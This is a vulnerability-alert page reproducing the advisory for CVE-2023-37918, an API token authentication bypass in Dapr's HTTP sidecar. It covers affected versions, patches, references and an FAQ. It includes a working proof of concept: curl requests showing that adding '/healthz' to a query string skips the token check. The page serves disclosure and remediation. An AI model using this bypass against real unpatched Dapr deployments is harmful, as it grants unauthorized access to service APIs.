CVE-2023-37918: API token authentication bypass in HTTP endpoints in Dapr
First published: Fri Jul 21 2023(Updated: )
### Summary A vulnerability has been found in Dapr that allows bypassing [API token authentication](https://docs.dapr.io/operations/security/api-token/), which is used by the Dapr sidecar to authenticate calls coming from the application, with a well-crafted HTTP request. Users who leverage API token authentication are encouraged to upgrade Dapr to 1.10.9 and 1.11.2. ### Impact This vulnerability impacts Dapr users who have configured API token authentication. An attacker could craft a request that is always allowed by the Dapr sidecar over HTTP, even if the `dapr-api-token` in the request is invalid or missing. ### Patches The issue has been fixed in Dapr 1.10.9 and 1.11.2. ### Details When API token authentication is enabled, Dapr requires all calls from applications to include the `dapr-api-token` header, with a value matching what's included in the Dapr's configuration. In order to allow for healthchecks to work, the `/v1.0/healthz` and `/v1.0/healthz/outbound` HTTP APIs are excluded from the API token authentication check, and are always allowed. Dapr <= 1.10.8 and <= 1.11.1 implemented the allowlisting of the healthcheck endpoints by permitting all requests whose URL contains `/healthz` to bypass the API token authentication check. The match applied anywhere in the URL, including the querystring. As a consequence, attackers were able to bypass API token authentication by including `/healthz` anywhere in the URL, including as a querystring parameter. This allowed attackers to invoke any Dapr API using HTTP, including perform service invocation. ### Proof of Concept ``` $ curl -v http://localhost:3500/v1.0/metadata * Trying ::1:3500... * Connected to localhost (::1) port 3500 (#0) > GET /v1.0/metadata HTTP/1.1 > Host: localhost:3500 > User-Agent: curl/7.74.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 401 Unauthorized < Date: Mon, 17 Jul 2023 18:13:13 GMT < Content-Type: text/plain; charset=utf-8 < Content-Length: 17 < Traceparent: 00-00000000000000000000000000000000-0000000000000000-00 < * Connection #0 to host localhost left intact invalid api token $ curl -v http://localhost:3500/v1.0/metadata -H "dapr-api-token: mytoken" * Trying ::1:3500... * Connected to localhost (::1) port 3500 (#0) > GET /v1.0/metadata HTTP/1.1 > Host: localhost:3500 > User-Agent: curl/7.74.0 > Accept: */* > dapr-api-token: mytoken > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 17 Jul 2023 18:13:26 GMT < Content-Type: application/json < Content-Length: 119 < Traceparent: 00-00000000000000000000000000000000-0000000000000000-00 < * Connection #0 to host localhost left intact {"id":"foo","actors":[],"extended":{"daprRuntimeVersion":"v1.11.1"},"components":[],"httpEndpoints":[],"subscriptions":[]} $ curl -v http://localhost:3500/v1.0/metadata?foo=/healthz * Trying ::1:3500... * Connected to localhost (::1) port 3500 (#0) > GET /v1.0/metadata?foo=/healthz HTTP/1.1 > Host: localhost:3500 > User-Agent: curl/7.74.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 17 Jul 2023 18:13:44 GMT < Content-Type: application/json < Content-Length: 119 < Traceparent: 00-00000000000000000000000000000000-0000000000000000-00 < * Connection #0 to host localhost left intact {"id":"foo","actors":[],"extended":{"daprRuntimeVersion":"v1.11.1"},"components":[],"httpEndpoints":[],"subscriptions":[]}
Credit: security-advisories@github.com security-advisories@github.com security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| Linuxfoundation Dapr | <1.10.9 | |
| Linuxfoundation Dapr | >=1.11.0<1.11.2 | |
| go/github.com/dapr/dapr | <1.10.9 | 1.10.9 |
| go/github.com/dapr/dapr | >=1.11.0<1.11.2 | 1.11.2 |
Never miss a vulnerability like this again
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
Reference Links
- https://github.com/dapr/dapr/security/advisories/GHSA-59m6-82qm-vqgj
- https://github.com/dapr/dapr/commit/83ca1abb11ffe34211db55dcd36d96b94252827a
- https://github.com/dapr/dapr/commit/99d6799c97b79397443c8c96737c9b893126a1ae
- https://nvd.nist.gov/vuln/detail/CVE-2023-37918
- https://docs.dapr.io/operations/security/api-token/
- https://github.com/advisories/GHSA-59m6-82qm-vqgj (Advisory)
Frequently Asked Questions
What is CVE-2023-37918?
CVE-2023-37918 is a vulnerability found in Dapr that allows bypassing API token authentication.
How does CVE-2023-37918 impact Dapr?
CVE-2023-37918 allows attackers to bypass API token authentication in Dapr.
What is the severity of CVE-2023-37918?
CVE-2023-37918 has a severity rating of high (7.5).
How can I fix CVE-2023-37918 in Dapr?
You can fix CVE-2023-37918 by updating to Dapr version 1.10.9 or higher.
Where can I find more information about CVE-2023-37918?
You can find more information about CVE-2023-37918 at the following references: [GitHub Advisory](https://github.com/dapr/dapr/security/advisories/GHSA-59m6-82qm-vqgj), [Dapr API Token Authentication](https://docs.dapr.io/operations/security/api-token/), [Dapr Commit](https://github.com/dapr/dapr/commit/83ca1abb11ffe34211db55dcd36d96b94252827a).
- collector/nvd-latest
- collector/nvd-index
- collector/nvd-cve
- collector/github-advisory-latest
- alias/GHSA-59m6-82qm-vqgj
- alias/CVE-2023-37918
- collector/github-advisory
- agent/type
- agent/softwarecombine
- agent/weakness
- agent/references
- collector/nvd-api
- agent/software-canonical-lookup-request
- agent/author
- agent/severity
- agent/remedy
- agent/description
- agent/title
- agent/event
- agent/first-publish-date
- agent/tags
- collector/mitre-cve
- source/MITRE
- agent/last-modified-date
- agent/trending
- vendor/linuxfoundation
- canonical/linuxfoundation dapr
- version/linuxfoundation dapr/1.11.0
- package-manager/go